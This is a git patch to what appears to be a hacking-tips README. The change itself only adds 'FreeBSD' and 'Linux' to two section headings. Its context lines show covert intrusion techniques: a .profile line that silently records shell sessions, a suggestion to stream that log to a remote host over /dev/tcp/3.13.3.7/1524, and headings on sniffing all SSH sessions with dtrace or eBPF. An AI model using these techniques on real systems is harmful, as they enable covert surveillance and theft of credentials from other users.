From 4996d26fa389c256441c7625498acf111fd54d30 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 23 Nov 2023 17:08:28 +0000 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2950f6d..74086df 100644 --- a/README.md +++ b/README.md @@ -1724,7 +1724,7 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. -**9.ii Sniff all SHELL sessions with dtrace** +**9.ii Sniff all SHELL sessions with dtrace - FreeBSD** Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes. @@ -1744,7 +1744,7 @@ Start a dtrace and log to /tmp/.log: ``` -**9.iii Sniff all SHELL sessions with eBPF** +**9.iii Sniff all SHELL sessions with eBPF - Linux** eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux.